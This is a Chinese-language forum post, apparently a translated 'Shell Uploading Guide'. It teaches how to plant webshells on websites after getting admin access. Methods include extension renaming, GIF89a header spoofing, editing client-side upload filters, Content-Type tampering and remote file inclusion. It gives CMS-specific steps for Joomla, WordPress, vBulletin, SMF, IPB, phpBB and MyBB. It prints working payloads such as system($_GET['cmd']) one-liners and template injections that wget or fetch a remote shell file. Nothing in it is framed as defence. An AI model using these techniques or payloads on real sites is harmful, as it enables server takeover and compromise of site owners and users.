注册
登录
会员
标签
统计
帮助
建锋网络论坛
»
网络攻防 Attack & Defense
» 上传Webshell的方法指南(Shell Uploading Guide)
‹‹ 上一主题
|
下一主题 ››
发新话题
发布投票
发布商品
发布悬赏
发布活动
发布辩论
发布视频
打印
上传Webshell的方法指南(Shell Uploading Guide)
李亦何
管理员
个人空间
发短消息
加为好友
当前离线
1
#
大
中
小
发表于 28-11-2020 08:22
显示全部帖子
上传Webshell的方法指南(Shell Uploading Guide)
---李亦何编译
当获得管理员访问权限/登录该网站后台管理后,许多新手在网站上传Shell时都遇到了问题. 所以,我写这篇文章是为他们做一些技术指导或帮助. 基本上说,shell使我们可以远程访问该服务器. 这样的Webshell可用不同的语言提供,例如php,asp / aspx,cgi等。因此,我们必须根据服务器脚本选择将在服务器上运行的Shell. 如果服务器支持php shell,那么我们必须选择任何php shell,否则选择asp&cgi。 现在,让我们进入要点... 登录到站站后台管理后,如果我们在网站中找到任何上载选项,则可以轻松地上传Webshell. 但是有时我们必须做一些更改才能上传shell。
方式1
由于Webshell采用PHP格式,因此有时某些站点不允许直接使用PHP扩展名来上传此类脚本. 如果发生这种情况,则只需重命名Webshell名称. 添加.gif / .jpg / .html / .doc等。示例:假设在重命名shell名称之前是shell.php,然后将其重命名为shell.php.jpg或其他名称。
方式2
首先上传一个简单的shell程序,防病毒和防火墙无法检测到该Webshell. 然后通过自己的shell上传多功能的Webshell, 你可以在网上下载到shell程序.
方式3
服务器的少量防火墙通过检查标头来检测Webshell脚本,并且不允许我们上传Webshell程序. 因此我们可以使用"GIF89A shell脚本旁路"方法绕过它. 在记事本中打开Webshell,添加"GIF89a;" 在Webshell程序代码开始之前不加引号. 如下...
GIF89a; 取决于他们使用哪种文件验证,服务器可能会以为它是一个映像,这使服务器误以为是因为它在读取文件时会找到gif标头,并会因为它是image而确保其安全。
方式4
此方法更高级, 这仅适用于客户端过滤器,不适用于服务器端. 下载适用于Firefox的Firebug,然后编辑上传的html。
<form enctype=\"multipart/form-data\" action=\"uploader.php\" method=\"
OST\"> Upload DRP File: <input name=\"Upload Saved Replay\" type=\"file\" accept=\"*.jpg\"/><br /> <input type=\"submit\" value=\"Upload File\" /> </form>
更改过滤器接受。 到*。*或将其完全删除,然后就可以上传任何类型的文件。
方式5
首先为您的firefox浏览器下载“ LIVE HTTP HEADERS”插件
1.将您的shell程序名称重命名为shell.php.jpg(或该网站支持的名称。在我的情况下,该网站仅支持jpg文件。这就是为什么我将其重命名为shell.php.jpg。)
2.打开Firefox并启动Live HTTP Headers插件,然后上传您的Shell。
3.然后,您的Live HTTP标头将类似于以下内容
liv1.jpg
(87.3 KB)
28-11-2020 08:22
4.然后,单击shell.php.jpg之后,再单击“Replay”按钮.
5.然后再次打开一个新窗口,在该窗口中将有两个框,但是我们必须在第二个框上进行操作。
6.在第二个框中,将您的shell.php.jpg重命名为shell.php,然后再次单击Reply按钮
liv2.jpg
(123.68 KB)
28-11-2020 08:22
方式6
为自己找到edjpgcom.exe的副本“ edjpgcom是一个免费的Windows应用程序,允许您更改(或添加)JPEG文件中的JPEG注释。” 用法:-edjpgcom“ filename.jpg”现在将其添加到jpg注释中,因为由于限制等原因您将无法在其中放置整个Webshell。
“; <?php system($_GET ['cmd']);echo ?>
现在将您的jpg重命名为.php并上传。
方式7
您可以欺骗Web服务器以使其认为上传映像而不是php shell的另一种方法是获取Firefox并安装“ tamperdata”,然后单击“启动篡改”并上传php shell,然后篡改抓包数据并更改content-Type 从“应用程序/八位字节流”到“image/jpeg”。 如果您在使用tamperdata上传shell时遇到任何问题,则只需执行简单的Google搜索即可,网络上有很多关于此的视频教程. 因此,我不会逐步解释这一点。
方式8
当我们在网站上找到一个上传按钮时,以上所有提及的方式均有效。 但是如果没有上传按钮,则在此处上传Webshell并不容易。 我们可以尝试一些事情……我们必须找出现有php / asp / aspx页面是否存在编辑选项。 如果有编辑选项,则打开该页面并删除整个脚本。 之后,在记事本中打开Webshell。 复制脚本,粘贴到该页面。 最后,保存它。 现在,该链接将成为您的Webshell。 也许我们可以在网站的以下页面中找到编辑选项……
Contact us.php /Contact us.asp
Class.php / Class.asp
About us.php /About us.asp
Terms.php / terms.asp
注意:在某些新闻,车辆销售,购物车等网站中,通过管理控制台登录后,没有任何选择可以上传文件. 它们仅允许通过cpanel登录后上传文件。
方式9
有时,在某些远程文件包括易受攻击的站点中,我们必须从另一个主机站点执行Webshell. 方法:
1)在免费的托管站点中上传您的Webshell,
www.my3gb.com
www.3owl.com
,
www.ripway.com
,
www.000webhost.com
等。
2)现在,假设您的带shell网站链接为:
www.example.my3gb.com/c99.txt
,而您的易受攻击站点为
www.site.com
3)现在,我们必须执行以下命令来获得对该站点的Shell访问。
http://www.site.com/v2/index.php?page=http://www.example.my3gb.com/c99.txt
4)根据您的Webshell和受害者网站链接替换命令中的网站链接。
在joomla,wp,vb,smf,ipb,mybb SITES中上传Webshell
在上面提到的网站中,我们通常无法找到直接的上传选项。 因此,我们必须通过其他方式进行。
1.Joomla网站:
登录到adminpanel后,您会在第5号找到扩展。展开它,单击它>模板管理器>检查任何模板(如beez,ja_purity),然后单击编辑(右上侧),然后单击编辑html。现在粘贴您的Webshell 代码,然后点击保存...完成site.com/templates/模板名称/index.php,如site.com/templates/beez/index.php
2.WordPress:
登录到管理面板,展开外观,然后单击编辑器>您将找到style.css,现在在右侧选择404.php粘贴您的Webshell代码,然后单击编辑文件,您可以在site.com/wp-content/themes/theme名称中找到Webshell 你edit / 404.php
3.Vbulletin:
1-登录admin cp后台管理
2-在“插件和产品”下,选择添加新插件
3-按如下所示调整设置:产品:vBulletin Hook位置:global_start标题:(任何内容……)执行顺序:码:
ob_start();系统($ _GET ['cmd']); $ execcode = ob_get_contents(); ob_end_clean();
插件处于活动状态:是
4-添加插件后,转到“样式和设计”标题,选择“样式管理器”
5-在下拉菜单中的默认样式下,选择编辑模板。
6-滚动ForumHome模型并进行扩展。单击FORUMHOME旁边的[自定义]。
7-搜索代码:
$ header在顶部附近的某个地方。替换为:代码:$ header $ execcode
8-现在进入论坛并在index.php之后添加码:
?cmd = wget
http://www.site.com/shell.txt;mv
shell.txt shell.php
所以看起来像代码:http: //www.site.com/pathtoforum/index.php?cmd=wget
http: //www.site.com/shell.txt;mv
shell.txt shell.php
这样做是下载shell.txt,然后将其重命名为shell.php。现在,该shell必须位于shell.php论坛目录中……如果没有,则在该服务器上禁用了wget,您可以尝试其他方法:
http://www.site.com/pathtoforum/index.php?cmd=CURL
http://www.site.com/shell.txt
> shell.php
http://www.site.com/pathtoforum/index.php?cmd=GET
http://www.site.com/shell.txt
shell.php
4,SMF
登录到管理面板,您需要下载zip格式的任何smf主题并将其放入你的shell.php并保存管理面板>选择主题和布局>安装新主题>浏览并上传具有shell.php的主题
之后 上传shell将找到> site.com/Themes/theme name / shell.php
5,IPB
登录管理面板>外观>管理语言,选择语言>部分(示例)public_help编辑:help.txt从列表中选择主题,或搜索主题在右侧框中添加以下代码:
$ {$ {print $ query ='cd缓存; wget http://link_to_shell/shell.txt; mv shell.txt shell.php'}} $ {$ {system($ query,$ out)}} $ {$ {print $ out}}
添加后,请指定到底部。现在我们继续
http://www.site.com/index.php?app=core&module=help
,我们添加的代码将完成,并且您将获得@Webshell,
www.site.com/cache/shell.php
6.phpBB
登录到管理面板>进行样式->模板->编辑,为模板文件选择faq_body.html在以下位置:
我们增加:
fwrite(fopen($_GET [o],'w'),file_get_contents($_GET ));
并保存它。现在继续:
www.site.com/forum/faq.php?o=shell.php&i=http://link_to_shell.com/shel
l.txt shell在站点路径/shell.php中找到
Mybb论坛登录admincp>转到模板和样式,找到默认的MyBB Theme。 然后转到模板,展开当前主题使用的模板。 查找日历模板,单击它。 点击“日历”。 在所有html代码上方,粘贴以下代码:
http://pastebin.com/9dHWmxNq
保存
shell将在site.com/calendar.php中找到
注意:如果您遇到类似“代码无法编辑的危险”的错误,则只需将您的污损代码粘贴到污损calendar.php
This artical link:
https://zer0w0rm.blogspot.com/2014/07/shell-uploading-guide.html
UID
3
帖子
154
精华
1
阅读权限
200
在线时间
70 小时
最后登录
4-3-2024
查看详细资料
TOP
‹‹ 上一主题
|
下一主题 ››
建锋网络论坛公告
建锋网络技术论坛
计算机硬件技术
电脑硬件 Computer Hardware
网络设备 Network Equipment
计算机软件技术
软件应用 Software Applications
软件开发 Software Development
软件下载 Software Download
计算机网络技术
数据库技术 Database Technology
联网技术 Networking Technology
网络奇文 Web Articles
服务器设置 Server Configuration
网络攻防 Attack & Defense
信息及发展专栏
新技术动态 New Technology Events
指点江山 Social Perspective
科学评论 Scientific Review
艺术精品 Fine Arts
史海求真 Historical Truth